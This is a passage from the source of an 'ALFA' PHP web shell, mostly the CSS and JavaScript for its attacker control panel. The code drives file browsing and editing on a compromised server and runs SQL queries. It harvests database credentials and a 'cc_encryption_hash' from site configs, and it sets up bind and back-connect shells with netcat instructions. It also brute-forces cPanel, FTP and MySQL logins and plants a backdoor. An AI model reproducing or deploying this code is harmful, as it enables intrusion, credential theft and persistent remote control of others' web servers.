    font-family: monospace;
    z-index: 10;
    transition: opacity 600ms ease-out;
    font-size: 15px;
    height: 19px;
}
.file-holder > .history:hover {
	background-color: #646464;
}
.editor-explorer > .hheader {
	position: relative;
    color: rgb(20, 255, 7);
    border-bottom: 2px rgb(32, 106, 162) solid;
    text-align: center;
    font-family: sans-serif;
    margin-bottom: 10px;
	height: 55px;
}
.editor-search {
	position: absolute;
    bottom: 7px;
    left: 31px;
}
.hheader-text {
	position: absolute;
    left: 8px;
    top: 2px;
}
.history-clear {
	position: absolute;
    right: 8px;
    top: 2px;
    cursor: pointer;
}
.editor-body {
	position: relative;
	margin-left: 3px;
}
.editor-anim-close {
	'.showAnimation("editorClose").'
}
@keyframes editorClose {
	0% {
		transform: scale(1);
		opacity: 1;
	}
	100% {
		transform: scale(0);
		opacity: 0;
	}
}
.editor-anim-minimize {
	'.showAnimation("editorMinimize").'
}
@keyframes editorMinimize {
	0% {
		right:0px;
		opacity: 1;
	}
	100% {
		right: -2000px;
		opacity: 0;
	}
}
.editor-anim-show {
	'.showAnimation("editorShow").'
}
@keyframes editorShow {
	0% {
		right:-2000px;
		opacity: 0;
	}
	100% {
		right: 0px;
		opacity: 1;
	}
}
.minimized-show {
	'.showAnimation("minimizeShow").'
}
@keyframes minimizeShow {
	0% {
		right: -30px;
		opacity: 0;
	}
	100% {
		right: 0px;
		opacity: 1;
	}
}
.minimized-hide {
	'.showAnimation("minimizeHide").'
}
@keyframes minimizeHide {
	0% {
		right: 0px;
		opacity: 1;
	}
	100% {
		right: -30px;
		opacity: 0;
	}
}
.solevisible-text:hover {
	-webkit-text-shadow: 0px 0px 25px #00FF00;
	-moz-text-shadow: 0px 0px 25px #00FF00;
	-ms-text-shadow: 0px 0px 25px #00FF00;
	text-shadow: 0px 0px 25px #00FF00;
}
.update-holder {
    position: fixed;
    top: 0;
    background-color: rgba(0, 24, 29, 0.72);
    width: 100%;
    height: 100%;
}
.update-partner {
    width: 50%;
    position: relative;
    border-radius: 31px;
    height: 200px;
    background-color: rgba(3, 3, 41, 0.47);
    text-align: center;
    color: rgba(252, 253, 251, 0.88);
    margin-left: 25%;
    top: 23%;
    font-family: "Francois One", sans-serif;
}
.update-partner:hover {
-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
}
.update-content {
	position: relative;
}
.update-content > a {
    text-decoration: none;
    position: absolute;
    color: rgba(103, 167, 47, 0.77);
    left: 24%;
    margin-top: 7%;
    font-size: 40px;
    font-family: "Francois One", sans-serif;
}
.update-close {
	position: absolute;
    right: 0;
    margin-right: 23px;
    top: 10px;
    font-size: 27px;
    background-color: #130f50;
    width: 5%;
    border-radius: 100px;
    cursor: pointer;
    border: 2px rgb(14, 38, 90) solid;
}
.update-close:hover {
	border: 2px #25ff00 solid;
    color: #FF0000;
}
.filestools {
    height: auto;
    width: auto;
    color: #67ABDF;
    font-size: 12px;
    font-family: Verdana,Geneva,sans-serif;
}
@-moz-document url-prefix() {
	#search-input {
		width: 173px;
	}
	.editor-path {
		top:3px;
	}
}
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
#alfaloader{'.$csscode.'width:100px;height:100px;}
#a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
.main th{text-align:left;}
.main a{color: #FFF;}
.main tr:hover{background-color:#646464;}
.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:99%; height:300px; }
'.alfaCssLoadColors().'
</style>';
echo "<script type='text/javascript'>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
var d = document;
var mysql_cache = {};
var editor_files = {};
var editor_error = true;
var editor_current_file = '';
var is_minimized = false;
var cgi_is_minimized = false;
var cgi_lang = '';
var upcount = 1;
var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
for($j=1;$j<=10;$j++){
echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
}
echo "
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}";
echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
function saveByKey(event){
	if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
	$("editor_edit_area").onsubmit();
	event.preventDefault();
	return false;
}
function setCookie(cname, cvalue, exdays){
    var d = new Date();
    d.setTime(d.getTime() + (exdays*24*60*60*1000));
    var expires = "expires="+ d.toUTCString();
    document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
}
function getCookie(name){
  var value = "; " + document.cookie;
  var parts = value.split("; " + name + "=");
  if (parts.length == 2) return parts.pop().split(";").shift();
}
function editorClose(pos){
	d.body.style.overflow = "visible";
	elem = $(pos);
	elem.setAttribute("class", "editor-anim-close");
	if(pos == "editor"){
		is_minimized = false;
	}else{
		cgi_is_minimized = false;
	}
	setTimeout(function(){
		elem.removeAttribute("class");
		elem.style.display = "none";
	}, 1000);
	d.body.style.overflow = "visible";
}
function showEditor(pos){
	$(pos).setAttribute("class", "editor-anim-show");
	$(pos+"-minimized").setAttribute("class", "minimized-hide");
	if(pos == "editor"){
		is_minimized = false;
		if(cgi_is_minimized){
			$("cgiloader-minimized").style.top = "30%";
		}
	}else{
		cgi_is_minimized = false;
		if(is_minimized){
			$("editor-minimized").style.top = "30%";
		}
	}
	d.body.style.overflow = "hidden";
}
function editorMinimize(pos){
	$(pos).setAttribute("class", "editor-anim-minimize");
	$(pos+"-minimized").setAttribute("class", "minimized-show");
	if(pos == "editor"){
		is_minimized = true;
		if(cgi_is_minimized){
			$("cgiloader-minimized").style.top = "20%";
			$("editor-minimized").style.top = "50%";
		}else{
			$("editor-minimized").style.top = "30%";
		}
	}else{
		cgi_is_minimized = true;
		if(is_minimized){
			$("cgiloader-minimized").style.top = "20%";
			$("editor-minimized").style.top = "50%";
		}else{
			$("cgiloader-minimized").style.top = "30%";
		}
	}
	d.body.style.overflow = "visible";
}
function clearEditorHistory(){
	var check = confirm("Are u Sure?");
	if(check){
		for(var i in editor_files){
			if(i != editor_current_file){
				removeHistory(i);
			}
		}
	}
}
function editor(file, mode, arg, pwd, file_id, type){
	if(type=="dir"&&file=="..")return false;
	if(mode == "download"){
		g("FilesTools",pwd,file,"download");
		return false;
	}
	var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
	file = file.trim();
	if(Object.keys(editor_files).length == 0){
		var cookie_file = getCookie("alfa_history_files");
		try{
			editor_files = JSON.parse(cookie_file);
			for(var t in editor_files){
				insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
			}
		}catch(e){}
	}
	if(file.indexOf("/") != -1){
		var file_split = file.split("/");
		file = file_split[file_split.length - 1];
		delete file_split[file_split.length - 1];
		cwd = file_split.join("/");
		if(islinux){
			cwd = "/"+cwd;
		}
	}
	if(typeof type == "undefined"){
		type = "";
	}
	if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
		cwd = pwd.trim();
	}
	try{
		for(var i in editor_files){
			if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
				can_append = false;
				file_id = i;
				break;
			}
		}
	}catch(e){
		console.log(e);
	}
	editor_error = true;
	if(typeof arg != "undefined" && arg.length != 0 && arg != null){
		param = alfab64(arg);
	}
	if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
		fid = alfab64(file_id);
		pure_fid = file_id;
	}else{
		var rand_fid = "file_" + getRandom(10);
		fid = alfab64(rand_fid);
		pure_fid = rand_fid;
	}
	alfaloader("block");
	_Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
		document.querySelector(".editor-content").innerHTML = e;
		$("editor").style.display  = "block";
		alfaloader("none");
		evalJS(e);
		if(mode != "delete" && editor_error){
			var active = d.getElementsByClassName("is_active");
			if(active.length != 0){
				active[0].className = "file-holder";
			}
			fid = pure_fid;
			file = decodeURIComponent(file);

			if(!editor_files[fid] && can_append){
				editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
				insertToHistory(fid, file, " is_active", type);
				if(mode=="mkfile"){
					g("FilesMan",null);
				}
			}else{
				$(fid).parentNode.className += " is_active";
			}
		}
		d.body.style.overflow = "hidden";
		d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
		if(editor_files[fid]){
			d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
		}
		editor_current_file = fid;
		if(is_minimized){
			showEditor("editor");
		}
		updateCookieEditor();
	});
	return false;
}
function insertToHistory(fid, file, mode, type){
	var active = "";
	if(mode && mode != 0){
		active = mode;
	}
	var NewElement = document.createElement("div");
	NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
	NewElement.className = "file-holder" + active;
	NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
	NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
	var refNode = d.getElementsByClassName("history-list")[0];
	refNode.insertBefore(NewElement, refNode.firstChild);
}
function loadType(file,type,id){
	if(type == "none"){
		_Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
			$(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
			editor_files[id].type = e;
		});
	}
	var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
	if(type == "file"){
		type = file.split(".");
		type  = type[type.length - 1].toLowerCase();
		var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
		if(types.indexOf(type) == -1){
			type = "notfound";
		}
	}else{
		type = "folder";
	}
	return img.replace("{type}",  type + ".png");
}
function updateDirsEditor(fid, fname){
	var current_path = d.mf.c.value + "/";
	var oldpath  = editor_files[fid].pwd + "/" + fname + "/";
	var newpath  = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
	oldpath = oldpath.replace(/\/\//g, "/");
	newpath = newpath.replace(/\/\//g, "/");
	current_path = current_path.replace(/\/\//g, "/");
	if(current_path.search(oldpath) != -1){
		initDir(current_path.replace(oldpath, newpath));
		d.mf.c.value = current_path.replace(oldpath, newpath);
		_Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
	}
	for(var i in editor_files){
		var path = editor_files[i].pwd + "/";
		path = path.replace(/\/\//g, "/");
		if(path.search(oldpath) != -1){
			editor_files[i].pwd = path.replace(oldpath, newpath);
		}
	}
	var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
	var reg2 = new RegExp(fname + " \\\|</b></a>");
	d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
	d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
	updateCookieEditor();
}
function updateCookieEditor(){
	setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
}
function setEditorTitle(fid, mode){
	if(mode == "out" && editor_current_file != ""){
